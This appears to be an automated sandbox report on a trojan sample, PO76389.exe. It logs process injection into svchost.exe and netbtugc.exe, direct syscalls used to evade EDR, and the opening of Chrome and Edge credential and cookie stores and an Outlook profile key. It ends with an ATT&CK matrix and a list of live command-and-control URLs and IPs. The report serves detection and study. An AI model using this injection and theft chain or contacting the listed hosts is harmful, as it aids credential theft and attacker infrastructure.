            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03169660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03169660 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B368C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031276B2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031276B2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031276B2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312D6AA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312D6AA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO76389.exe Code function: 0_2_004DA937 GetProcessHeap,
            Source: C:\Users\user\Desktop\PO76389.exe Code function: 0_2_004D8E19 SetUnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\PO76389.exe Code function: 0_2_004D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 6404
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
            Source: C:\Users\user\Desktop\PO76389.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 27C0008
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004EBE95 LogonUserW,0_2_004EBE95
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_004B374E
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004F4B52 SendInput,keybd_event,0_2_004F4B52
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004F7DD5 mouse_event,0_2_004F7DD5
            Source: C:\Users\user\Desktop\PO76389.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO76389.exe"
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004EB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_004EB398
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004EBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004EBE31
            Source: TrBUxuahdhJ.exe, 00000004.00000000.2453637950.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000002.4568940643.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569241870.00000000016F1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: PO76389.exe, TrBUxuahdhJ.exe, 00000004.00000000.2453637950.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000002.4568940643.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569241870.00000000016F1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: TrBUxuahdhJ.exe, 00000004.00000000.2453637950.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000002.4568940643.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569241870.00000000016F1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: PO76389.exe, 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: TrBUxuahdhJ.exe, 00000004.00000000.2453637950.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000002.4568940643.0000000000EB1000.00000002.00000001.00040000.00000000.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4569241870.00000000016F1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D7254 cpuid 0_2_004D7254
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D40DA GetSystemTimeAsFileTime,__aulldiv,0_2_004D40DA
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_0052C146 GetUserNameW,0_2_0052C146
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004E2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_004E2C3C
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004CE47B

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: PO76389.exe, 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: PO76389.exe | Binary or memory string: WIN_81
            Source: PO76389.exe | Binary or memory string: WIN_XP
            Source: PO76389.exe | Binary or memory string: WIN_XPe
            Source: PO76389.exe | Binary or memory string: WIN_VISTA
            Source: PO76389.exe | Binary or memory string: WIN_7
            Source: PO76389.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_005091DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_005091DC
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_005096E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_005096E2
            MITRE ATT&CK Matrix (techniques listed per tactic; the report's count for a matched technique is given in parentheses)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
            Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
            Execution: Native API (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
            Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
            Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At; Cron
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (31); Software Packing (1); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
            Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
            Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1); Network Service Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
            Behavior Graph ID: 1511731, Sample: PO76389.exe, Start date: 16/09/2024, Architecture: WINDOWS, Score: 100
            Graph-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures
            Graph-level DNS/IP: www.siyue.xyz; www.quantumnests.xyz (Performs DNS queries to domains with low reputation); 17 other IPs or domains
            • PO76389.exe started (Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces)
              • svchost.exe started (Maps a DLL or memory area into another process)
                • TrBUxuahdhJ.exe injected (Found direct / indirect Syscall (likely to bypass EDR))
                  • netbtugc.exe started (Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures)
                    • TrBUxuahdhJ.exe injected (Found direct / indirect Syscall (likely to bypass EDR)); DNS/IP: www.independent200.org 103.42.108.46, ports 49721, 49722, 49723, SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia; parcelfly.net 84.32.84.32, ports 49737, 49738, 49739, NTT-LT-ASLT Lithuania; 7 other IPs or domains
                    • firefox.exe started
            Source | Detection | Scanner | Label
            PO76389.exe | 76% | ReversingLabs | Win32.Trojan.AutoitInject
            PO76389.exe | 74% | Virustotal |
            PO76389.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.personal-loans-jp8.xyz/wwak/?prutfR_P=E3TGpDthwwVtcd6zArHMi0+elvxdJNsp076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUa15ZbVJvSSR5vxb+VJw93FLmyr7mIfPMGWfmtP/A6wTj3w==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.independent200.org/yl6y/?u8b=M0MH_xux6&prutfR_P=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+FSdSIKD6JgMVQEI+NVmTQ69s3vAAdvPATGhITAPXZUXQ6A==0%Avira URL Cloudsafe
            http://www.mediaplug.biz/osde/0%Avira URL Cloudsafe
            https://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR0%Avira URL Cloudsafe
            http://www.personal-loans-jp8.xyz/wwak/0%Avira URL Cloudsafe
            http://www.fimgroup.net:80/f3w9/?prutfR_P=Dh4Gi90%Avira URL Cloudsafe
            http://www.shipincheshi.skin/0vb3/?prutfR_P=xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.independent200.org/yl6y/0%Avira URL Cloudsafe
            http://www.quantumnests.xyz/vnd3/0%Avira URL Cloudsafe
            http://www.parcelfly.net/n59g/0%Avira URL Cloudsafe
            http://www.mediaplug.biz/osde/?prutfR_P=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.tigre777gg.online/06rp/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.shipincheshi.skin/0vb3/0%Avira URL Cloudsafe
            http://www.quantumnests.xyz/vnd3/?prutfR_P=xYBn5zztkuVfiCwoRQOy2opDl7RgoPyR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERRmF7/bt0PBBiFKuaDRgyJqJJ+MxR9VKTQpRM54mqQi17vQ==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.thinkphp.cn0%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/0%Avira URL Cloudsafe
            http://www.fimgroup.net/f3w9/0%Avira URL Cloudsafe
            http://www.chamadaslotgiris.net/gqyt/?prutfR_P=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.parcelfly.net/n59g/?prutfR_P=5pnE2UHiCW8ObGXSgpx/iGO8gW0d7AEBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ha7dmOKO9m7V5QX/Ut0iNssFIOAJa+JBBsuFpAHajyYobg==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.fimgroup.net0%Avira URL Cloudsafe
            http://www.fimgroup.net/f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5hsiNdt2NoWcO3TRD6+a1p9HDTSMRDAgwWxIW4AdBTiWqaWdzxLVl6hXjmw9P5qUhA==&u8b=M0MH_xux60%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/?prutfR_P=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&u8b=M0MH_xux60%Avira URL Cloudsafe
